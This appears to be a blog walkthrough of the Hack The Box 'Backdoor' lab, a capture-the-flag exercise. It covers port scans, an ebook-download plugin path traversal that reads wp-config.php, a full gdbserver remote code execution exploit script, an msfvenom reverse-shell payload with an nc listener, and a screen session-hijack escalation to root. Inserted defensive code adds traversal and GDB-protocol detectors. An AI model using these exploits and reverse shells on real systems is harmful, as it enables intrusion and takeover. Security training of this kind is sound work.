Lluna's Pure land.

What is life like when singing to wine?


HTB-Backdoor

0x00. Summary

0x01. Information gathering

Only ports 80, 22 and 1337 are open.

┌──(root💀kali)-[~]
└─# rustscan -a 10.10.11.125 -- -A 130 ⨯
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.125:22
Open 10.10.11.125:80
Open 10.10.11.125:1337
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-05 01:50 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
Initiating Ping Scan at 01:50
Scanning 10.10.11.125 [4 ports]
Completed Ping Scan at 01:50, 0.31s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 01:50
Scanning backdoor.htb (10.10.11.125) [3 ports]
Discovered open port 22/tcp on 10.10.11.125
Discovered open port 80/tcp on 10.10.11.125
Discovered open port 1337/tcp on 10.10.11.125
Completed SYN Stealth Scan at 01:50, 0.82s elapsed (3 total ports)
Initiating Service scan at 01:50
Scanning 3 services on backdoor.htb (10.10.11.125)
Completed Service scan at 01:53, 175.46s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against backdoor.htb (10.10.11.125)
Retrying OS detection (try #2) against backdoor.htb (10.10.11.125)
Initiating Traceroute at 01:53
Completed Traceroute at 01:53, 1.89s elapsed
Initiating Parallel DNS resolution of 1 host. at 01:53
Completed Parallel DNS resolution of 1 host. at 01:53, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
NSE: Script scanning 10.10.11.125.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:53
Completed NSE at 01:54, 25.13s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:54
Completed NSE at 01:54, 5.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:54
Completed NSE at 01:54, 0.00s elapsed
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up, received echo-reply ttl 63 (0.98s latency).
Scanned at 2022-01-05 01:50:23 EST for 229s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| ssh-rsa (key omitted)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIuoNkiwwo7nM8ZE767bKSHJh+RbMsbItjTbVvKK4xKMfZFHzroaLEe9a2/P1D9h2M6khvPI74azqcqnI8SUJAk=
| 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB7eoJSCw4DyNNaFftGoFcX4Ttpwf+RPo0ydNk7yfqca
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open waste? syn-ack ttl 63
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=1/5%OT=22%CT=%CU=33086%PV=Y%DS=2%DC=T%G=N%TM=61D54094%P=x86_64-pc-linux-gnu)
SEQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)
SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%TS=B)
OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 3.355 days (since Sat Jan 1 17:23:05 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 452.39 ms 10.10.16.1
2 862.16 ms backdoor.htb (10.10.11.125)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:54
Completed NSE at 01:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:54
Completed NSE at 01:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:54
Completed NSE at 01:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 230.65 seconds
Raw packets sent: 76 (5.268KB) | Rcvd: 60 (4.360KB)

0x02. Visiting port 80

Add a hosts entry: 10.10.11.125 backdoor.htb

Browsing the site by hand shows it is a WordPress site, and nothing sensitive is leaked.

0x03. wpscan scan

The WordPress version is 5.8.1; no vulnerability has been published for this version so far, and the scan found no plugins in use.

┌──(root💀kali)-[~]
└─# wpscan --url http://10.10.11.125 1 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Wed Jan 5 00:39:16 2022

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
| Latest Version: 2.8 (up to date)
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
| Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:01:47 <====================================================> (137 / 137) 100.00% Time: 00:01:47

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Jan 5 00:42:56 2022
[+] Requests Done: 180
[+] Cached Requests: 5
[+] Data Sent: 46.386 KB
[+] Data Received: 14.424 MB
[+] Memory used: 234.215 MB
[+] Elapsed time: 00:03:40

┌──(root💀kali)-[~]
└─# wpscan --url http://10.10.11.125 --wp-plugins-dir

Scan Aborted: missing argument: --wp-plugins-dir

┌──(root💀kali)-[~]
└─# searchsploit wordpress | grep 5.8.1 1 ⨯

┌──(root💀kali)-[~]
└─#

0x04. Directory scan

This time ffuf is used; it finds the wp-content, wp-includes and wp-admin directories.

┌──(root💀kali)-[~]
└─# ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://backdoor.htb/FUZZ -t 200

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v1.3.1 Kali Exclusive <3
________________________________________________

:: Method : GET
:: URL : http://backdoor.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________

# on atleast 2 different hosts [Status: 200, Size: 63901, Words: 3834, Lines: 330]
wp-content [Status: 301, Size: 317, Words: 20, Lines: 10]
# [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# directory-list-2.3-medium.txt [Status: 200, Size: 63901, Words: 3834, Lines: 330]
[Status: 200, Size: 63901, Words: 3834, Lines: 330]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# This work is licensed under the Creative Commons [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# [Status: 200, Size: 63901, Words: 3834, Lines: 330]
wp-includes [Status: 301, Size: 318, Words: 20, Lines: 10]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# Copyright 2007 James Fisher [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# [Status: 200, Size: 63901, Words: 3834, Lines: 330]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 0, Words: 1, Lines: 1]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 0, Words: 1, Lines: 1]
wp-admin [Status: 301, Size: 315, Words: 20, Lines: 10]
[Status: 200, Size: 0, Words: 1, Lines: 1]
[WARN] Caught keyboard interrupt (Ctrl-C)

0x05. Checking the plugins directory

The plugins directory lives under wp-content by default, and in it there is a plugin called ebook-download.

Its readme.txt shows version 1.1.

0x06. Exploitation

A Google search turns up a directory traversal vulnerability.

PoC:

/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

Reading the file reveals the account user.

Traversing to /home/user/user.txt did not work.
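The traversal works because the plugin joins the ebookdownloadurl parameter straight onto its own directory, so three "../" climb out of wp-content/plugins/ebook-download to the WordPress root. As an added example (not code from this post or from the plugin), the Python below puts that unsafe join beside a containment check that rejects it, and adds a log-side detector for the parameter; PLUGIN_DIR and the sample request lines are constructed assumptions, not values taken from the target.

```python
import posixpath
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed plugin directory on the web server (hypothetical, not read from the box).
PLUGIN_DIR = "/var/www/html/wp-content/plugins/ebook-download"


def vulnerable_resolve(base: str, requested: str) -> str:
    """The unsafe pattern: join user input onto the base and serve whatever results."""
    return posixpath.normpath(posixpath.join(base, requested))


def safe_resolve(base: str, requested: str) -> Optional[str]:
    """Hardened variant: reject NUL bytes and absolute paths, normalise, and require
    the result to stay inside base. Returns None when the request escapes."""
    if "\x00" in requested or posixpath.isabs(requested):
        return None
    base_norm = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base_norm, requested))
    # The trailing "/" stops a sibling such as ".../ebook-download2" from passing.
    if candidate == base_norm or candidate.startswith(base_norm + "/"):
        return candidate
    return None


def traversal_in_request(request_target: str, param: str = "ebookdownloadurl") -> bool:
    """Log-side detector: True if the parameter, after URL decoding, climbs with '..'."""
    query = urlsplit(request_target).query
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    for v in values:
        decoded = unquote(unquote(v))  # parse_qs decoded once; unwrap double encoding too
        parts = decoded.replace("\\", "/").split("/")
        if ".." in parts:
            return True
    return False


# Constructed request targets (not from a real access log) to exercise the detector.
SAMPLE_REQUESTS = [
    "/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php",
    "/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2Fwp-config.php",
    "/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=books/sample.pdf",
]

if __name__ == "__main__":
    for r in SAMPLE_REQUESTS:
        print(("TRAVERSAL " if traversal_in_request(r) else "ok        ") + r)
    print("unsafe :", vulnerable_resolve(PLUGIN_DIR, "../../../wp-config.php"))
    print("safe   :", safe_resolve(PLUGIN_DIR, "../../../wp-config.php"))
    print("safe   :", safe_resolve(PLUGIN_DIR, "books/sample.pdf"))
```

The string-level check is enough to show the idea; a real download handler should additionally resolve the candidate with realpath so that a symlink inside the plugin directory cannot point back outside it, and should serve only from a dedicated files subdirectory rather than the plugin root.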

0x07. Exploiting port 1337

01. First method: exploit-db script

The test has now hit a bottleneck, so next we take port 1337 as the way in and go back to Google to search for port 1337.

Port 1337 reference

Here I found a gdbserver RCE.

PoC:

Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver -> 10.10.10.200:1337
- Attacker's listener -> 10.10.10.100:4444

1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=6666 PrependFork=true -o rev.bin

2. Listen with Netcat:
$ nc -nlvp 6666

3. Run the exploit:
$ python3 {sys.argv[0]} 10.10.11.125:1337 rev.bin

The script is as follows:

#!/usr/bin/env python3
import binascii
import socket
import struct
import sys


def checksum(s: str) -> str:
    # GDB remote protocol checksum: sum of the packet bytes modulo 256,
    # sent as exactly two hex digits (zero padded, so values below 0x10 are valid).
    res = sum(map(ord, s)) % 256
    return f'{res:02x}'


def ack(sock):
    sock.send(b'+')


def send(sock, s: str) -> str:
    # Frame the command as $<data>#<checksum>, read the reply and acknowledge it.
    sock.send(f'${s}#{checksum(s)}'.encode())
    res = sock.recv(1024)
    ack(sock)
    return res.decode()


def exploit(sock, payload: str):
    send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')
    send(sock, '!')
    try:
        # Single-step once; the stop reply carries the program counter register.
        res = send(sock, 'vCont;s')
        data = res.split(';')[2]
        arch, pc = data.split(':')
    except Exception:
        print('[!] ERROR: Unexpected response. Try again later')
        exit(1)
    if arch == '10':
        print('[+] Found x64 arch')
        pc = binascii.unhexlify(pc[:pc.index('0*')])
        pc += b'\0' * (8 - len(pc))
        addr = hex(struct.unpack('<Q', pc)[0])[2:]
        addr = '0' * (16 - len(addr)) + addr
    elif arch == '08':
        print('[+] Found x86 arch')
        pc = binascii.unhexlify(pc)
        pc += b'\0' * (4 - len(pc))
        addr = hex(struct.unpack('<I', pc)[0])[2:]
        addr = '0' * (8 - len(addr)) + addr
    else:
        # The original fell through here with addr undefined.
        print(f'[!] ERROR: Unsupported register id {arch}')
        exit(1)

    hex_length = hex(len(payload))[2:]

    print('[+] Sending payload')
    send(sock, f'M{addr},{hex_length}:{payload}')
    send(sock, 'vCont;c')


def main():
    if len(sys.argv) < 3:
        # The original printed an undefined name here; the full usage text is given above.
        print(f'Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>')
        exit(1)
    ip, port = sys.argv[1].split(':')
    file = sys.argv[2]
    try:
        with open(file, 'rb') as f:
            payload = f.read().hex()
    except FileNotFoundError:
        print(f'[!] ERROR: File {file} not found')
        exit(1)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((ip, int(port)))
        print('[+] Connected to target. Preparing exploit')
        exploit(sock, payload)
        print('[*] Pwned!! Check your listener')


if __name__ == '__main__':
    main()
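What the script relies on is that gdbserver speaks an unauthenticated protocol: anyone who can reach port 1337 can single-step the debuggee, write its memory with an M packet and resume it. As an added example (not part of the original post and not part of the exploit), the Python below parses the GDB remote serial protocol framing that the script builds by hand, verifies each checksum, and flags the write-then-continue sequence in a captured client-to-server stream; the sample capture, the address in it and the filler bytes are constructed, not real traffic.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# One GDB Remote Serial Protocol frame: '$' <body> '#' <two hex checksum digits>.
FRAME_RE = re.compile(r"\$([^#]*)#([0-9a-fA-F]{2})")


@dataclass
class Frame:
    body: str
    checksum_ok: bool


def rsp_checksum(body: str) -> int:
    """Modulo-256 sum of the body bytes, as the protocol defines it."""
    return sum(body.encode("latin-1")) % 256


def frame(body: str) -> bytes:
    """Wrap a body into a correctly checksummed frame (used here only to build sample data)."""
    return f"${body}#{rsp_checksum(body):02x}".encode("latin-1")


def parse_stream(data: bytes) -> List[Frame]:
    """Split a captured client->gdbserver byte stream into frames and verify each checksum."""
    text = data.decode("latin-1")
    return [Frame(m.group(1), rsp_checksum(m.group(1)) == int(m.group(2), 16))
            for m in FRAME_RE.finditer(text)]


def memory_writes(frames: List[Frame]) -> List[Tuple[int, int]]:
    """(address, byte_count) for every well-formed 'M addr,len:data' write packet."""
    out = []
    for f in frames:
        if not f.checksum_ok or not f.body.startswith("M"):
            continue
        head, _, _data = f.body[1:].partition(":")
        addr, _, length = head.partition(",")
        out.append((int(addr, 16), int(length, 16)))
    return out


def looks_like_code_injection(frames: List[Frame]) -> bool:
    """True when a memory write ('M' or binary 'X') is later followed by a resume ('c' or 'vCont;c')."""
    seen_write = False
    for f in frames:
        if not f.checksum_ok:
            continue  # gdbserver NAKs these, so they never took effect
        if f.body.startswith(("M", "X")):
            seen_write = True
        elif seen_write and (f.body == "c" or f.body.startswith("vCont;c")):
            return True
    return False


# Constructed sample capture (not real traffic): the handshake, a single-step with a
# deliberately bad checksum, a 4-byte write of placeholder bytes to a made-up pc, and a continue.
SAMPLE_CAPTURE = (
    frame("qSupported:multiprocess+;qRelocInsn+;qvCont+;")
    + frame("!")
    + b"$vCont;s#00"
    + frame("M00007ffff7fd0100,4:41414141")
    + frame("vCont;c")
)

if __name__ == "__main__":
    frames = parse_stream(SAMPLE_CAPTURE)
    for fr in frames:
        print(f"{'ok ' if fr.checksum_ok else 'BAD'} {fr.body}")
    print("memory writes:", memory_writes(frames))
    print("write-then-continue seen:", looks_like_code_injection(frames))
```

The detector is only a fallback; the protocol has no authentication to add, so the fix on the server side is to keep gdbserver bound to localhost (or reachable only through an SSH tunnel) and to never leave it listening on a routable interface.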

We get user.txt

python3 -c 'import pty; pty.spawn("/bin/bash")'

02. Second method: Metasploit

Use the exploit/multi/gdb/gdb_server_exec module.

0x08. Privilege escalation

Trying sudo -l asks for the password of user.

user@Backdoor:/home/user$ sudo -l
sudo -l
[sudo] password for user:

Sorry, try again.
[sudo] password for user:

Sorry, try again.
[sudo] password for user:

sudo: 3 incorrect password attempts
user@Backdoor:/home/user$

Look for SUID binaries

user@Backdoor:/home/user$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/screen
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/pkexec
user@Backdoor:/home/user$

Privilege escalation via screen

export TERM=xterm
screen -x root/root

root@Backdoor:~# whoami
root
root@Backdoor:~# ls
root.txt
root@Backdoor:~# cat root.txt
**********************************
root@Backdoor:~#
-------------So much to say, so little paper; see you next time-------------